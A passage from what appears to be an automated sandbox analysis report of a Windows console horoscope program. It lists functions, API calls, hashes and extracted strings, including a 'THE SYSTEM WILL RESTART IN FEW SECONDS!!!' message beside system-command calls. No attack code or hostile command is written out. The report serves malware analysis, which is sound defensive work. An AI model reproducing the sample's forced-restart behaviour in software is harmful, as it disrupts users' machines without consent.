                                                                          • API String ID: 2457902448-3680217290
                                                                          • Opcode ID: 4a37d46bbf4a80765277e634bc4cec7c68f43b869322eef35779c780955689fd
                                                                          • Instruction ID: efaac68bc660afe28738b7430f33366d7541d81ac9dcb58a73544a1dae0e15ae
                                                                          • Opcode Fuzzy Hash: 4a37d46bbf4a80765277e634bc4cec7c68f43b869322eef35779c780955689fd
                                                                          • Instruction Fuzzy Hash: DCF015B980430EABCB08EFCAF9098AFBBB4AB0620CF11425CE6143B305D770461C8BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D19D0, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D19DF
                                                                          • _wprintf.LIBCMT ref: 013D19F3
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1A07
                                                                          • _wprintf.LIBCMT ref: 013D1A1B
                                                                          • _wprintf.LIBCMT ref: 013D1A2F
                                                                          • _wprintf.LIBCMT ref: 013D1A43
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: .':$.'`.$...$Your horoscope sign is Sagittarius- The Archer$`..'
                                                                          • API String ID: 2991887721-335015388
                                                                          • Opcode ID: bbf5fac657304154532f46eb94db1211c4e2f9c4a1f8a73e572522873910c210
                                                                          • Instruction ID: c20887fb25f28badfa64500862e304ddbfc781b03d00e19975737764e32699d4
                                                                          • Opcode Fuzzy Hash: bbf5fac657304154532f46eb94db1211c4e2f9c4a1f8a73e572522873910c210
                                                                          • Instruction Fuzzy Hash: 68E0EDBA1443C66DC2107BAABD2EB057659775672CF43061CD22415728FBB80408C751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1B10, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D1B1F
                                                                          • _wprintf.LIBCMT ref: 013D1B33
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1B47
                                                                          • _wprintf.LIBCMT ref: 013D1B5B
                                                                          • _wprintf.LIBCMT ref: 013D1B6F
                                                                          • _wprintf.LIBCMT ref: 013D1B83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: --:--:--$.-` `-.$: :$Your horoscope sign is Pisces-The Fishes$`-. .-'
                                                                          • API String ID: 2991887721-1311341538
                                                                          • Opcode ID: 1d1c2993c4b8487a30c451886e536d328dcd2004000fbf552e25049b9ef92949
                                                                          • Instruction ID: 9843de17647c8719f2e2a536d5633a3d0108b57a0258b1fc4e179a8343e9d95e
                                                                          • Opcode Fuzzy Hash: 1d1c2993c4b8487a30c451886e536d328dcd2004000fbf552e25049b9ef92949
                                                                          • Instruction Fuzzy Hash: 64E07DA65443C269D6107B6BBD0AB09765A779773CF43061CD6241572CEBB80108C765
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1A50, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D1A5F
                                                                          • _wprintf.LIBCMT ref: 013D1A73
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1A87
                                                                          • _wprintf.LIBCMT ref: 013D1A9B
                                                                          • _wprintf.LIBCMT ref: 013D1AAF
                                                                          • _wprintf.LIBCMT ref: 013D1AC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: Your horoscope sign is Capricorn- The Goat$\ /_)$\ /`.$\ / ;$\/ __.'
                                                                          • API String ID: 2991887721-734789416
                                                                          • Opcode ID: 89bca8a3b42a49a738e41f5ca51365217fcbc235bd9667e6e096d0b4b1222b9b
                                                                          • Instruction ID: 4c30e78ce3096e38fd0ae923a75f1cb7215957c4aedb23da818776d808390760
                                                                          • Opcode Fuzzy Hash: 89bca8a3b42a49a738e41f5ca51365217fcbc235bd9667e6e096d0b4b1222b9b
                                                                          • Instruction Fuzzy Hash: 4DE07DA65443C279D6107B57FD09F09765A776773CF43061CD22915628EBB80008C751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D25B0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __CxxThrowException@8.LIBCMT ref: 013D25D9
                                                                            • Part of subcall function 013DCF71: RaiseException.KERNEL32(?,?,013F8F48,ios_base::eofbit set,?,?,013D26A1), ref: 013DCFB3
                                                                          • std::exception::exception.LIBCMT ref: 013D2600
                                                                          • __CxxThrowException@8.LIBCMT ref: 013D261F
                                                                          • std::exception::exception.LIBCMT ref: 013D2641
                                                                          • __CxxThrowException@8.LIBCMT ref: 013D2660
                                                                          • std::exception::exception.LIBCMT ref: 013D267D
                                                                          • __CxxThrowException@8.LIBCMT ref: 013D269C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                          • API String ID: 4237746311-1866435925
                                                                          • Opcode ID: 25f504d69104caee33e36de1cd6e2a50c91d4f3791e0a8f515a66ab0c06f59c3
                                                                          • Instruction ID: 491a892126adb73b8b1d05d0d8490328c760fa3c7f791e65fcdb206b27765730
                                                                          • Opcode Fuzzy Hash: 25f504d69104caee33e36de1cd6e2a50c91d4f3791e0a8f515a66ab0c06f59c3
                                                                          • Instruction Fuzzy Hash: C32192B64183429FC304EF5DE405A9FBBE8AF9465CF048A8EF69857290D770950CCB63
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D9C86, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 013D9C8D
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 013D9C97
                                                                          • int.LIBCPMT ref: 013D9CAE
                                                                            • Part of subcall function 013D8FA5: std::_Lockit::_Lockit.LIBCPMT ref: 013D8FB8
                                                                          • std::locale::_Getfacet.LIBCPMT ref: 013D9CB7
                                                                          • messages.LIBCPMT ref: 013D9CD1
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 013D9CE5
                                                                          • __CxxThrowException@8.LIBCMT ref: 013D9CF3
                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 013D9D03
                                                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 013D9D09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::_
                                                                          • String ID: bad cast
                                                                          • API String ID: 2153951062-3145022300
                                                                          • Opcode ID: 5fddbe8915c243124c38d472769bcad60a082d04e21a2281cefdb04c77dd6a9d
                                                                          • Instruction ID: c2d74918bb8482eacc2b3aecfb985c073c19f5b5af35b6fd5fa61ab5881d3306
                                                                          • Opcode Fuzzy Hash: 5fddbe8915c243124c38d472769bcad60a082d04e21a2281cefdb04c77dd6a9d
                                                                          • Instruction Fuzzy Hash: C001843794021A97CF05EBE8F944AFD7279AF5472CF110108E6156B2E0DF749A05C750
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D4390, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                            • Part of subcall function 013D1000: __wsystem.LIBCMT ref: 013D1015
                                                                            • Part of subcall function 013D1000: _memset.LIBCMT ref: 013D1039
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D106E
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D109C
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D1112
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D111C
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D113C
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D1150
                                                                            • Part of subcall function 013D1000: _wprintf.LIBCMT ref: 013D1170
                                                                            • Part of subcall function 013D1E40: __wsystem.LIBCMT ref: 013D1E4D
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E78
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E90
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EB9
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1ECD
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EE1
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EF5
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F09
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F1D
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F31
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F45
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F59
                                                                            • Part of subcall function 013D1E40: _wscanf.LIBCMT ref: 013D1F67
                                                                          • __wsystem.LIBCMT ref: 013D43AD
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D43C2
                                                                          • _wprintf.LIBCMT ref: 013D43F8
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D176F
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D1783
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D1797
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D17AB
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D17BF
                                                                            • Part of subcall function 013D1760: _wprintf.LIBCMT ref: 013D17D3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D43DA
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D4428
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__fread_nolock_wscanf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_flsall_free_memset
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 78452027-1074222490
                                                                          • Opcode ID: 0623715f8f4416e79b8d6192c00cd8112f275d78f99ce0b5c3de02527de308b4
                                                                          • Instruction ID: 4ccaa4d6b3b5465b75c423a55410d8b62fe13ea88797afb8409029ef5c0b5173
                                                                          • Opcode Fuzzy Hash: 0623715f8f4416e79b8d6192c00cd8112f275d78f99ce0b5c3de02527de308b4
                                                                          • Instruction Fuzzy Hash: B4F0A9B7940247ABC6107BEFBC45C6FB625AB6676DF01021CE55465208DB70401887B3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D7EAB, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                            • Part of subcall function 013D1E40: __wsystem.LIBCMT ref: 013D1E4D
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E78
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E90
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EB9
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1ECD
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EE1
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1EF5
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F09
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F1D
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F31
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F45
                                                                            • Part of subcall function 013D1E40: _wprintf.LIBCMT ref: 013D1F59
                                                                            • Part of subcall function 013D1E40: _wscanf.LIBCMT ref: 013D1F67
                                                                          • __wsystem.LIBCMT ref: 013D7EC3
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D7ED8
                                                                          • _wprintf.LIBCMT ref: 013D7F0E
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B1F
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B33
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B47
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B5B
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B6F
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B83
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D7EF0
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D7F45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__fread_nolock__wsystem_wscanf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_flsall_free
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 2439533185-1074222490
                                                                          • Opcode ID: 04b697ac6786898514a72f0fc2c43e8355d68becbbe6a55cc2da657fe375500b
                                                                          • Instruction ID: e3f8bffd5313cb5f8d790858f293f4de3c0abc4b5d1bdd603bd112f5cb729691
                                                                          • Opcode Fuzzy Hash: 04b697ac6786898514a72f0fc2c43e8355d68becbbe6a55cc2da657fe375500b
                                                                          • Instruction Fuzzy Hash: 7E0186B7910246ABC7147BEEFC4A86EBA68AB6636CF41061CE51566204DB70005CC7B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D520E, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D5221
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D5236
                                                                          • _wprintf.LIBCMT ref: 013D526C
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D185F
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D1873
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D1887
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D189B
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18AF
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18C3
                                                                            • Part of subcall function 013D1850: _wprintf.LIBCMT ref: 013D18D7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D524E
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D52A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 516305062-1074222490
                                                                          • Opcode ID: 5c53b1fab46881abfd8e6077e44c24e8ded7202e6aaf3c49f348bbdcb9c8099e
                                                                          • Instruction ID: 93be80eb7bde002103bea3bd89b2118319fb6e0dc03bd74052994bb55c044d5a
                                                                          • Opcode Fuzzy Hash: 5c53b1fab46881abfd8e6077e44c24e8ded7202e6aaf3c49f348bbdcb9c8099e
                                                                          • Instruction Fuzzy Hash: 06F0A4F6940242AAC614BBEEBD4686EBA68EB6736DF01021CE55465208DB71010CC7B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D3C3A, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D3C4D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D3C62
                                                                          • _wprintf.LIBCMT ref: 013D3C98
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D16DF
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D16F3
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D1707
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D171B
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D172F
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D1743
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D1757
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D3C7A
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D3CCE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
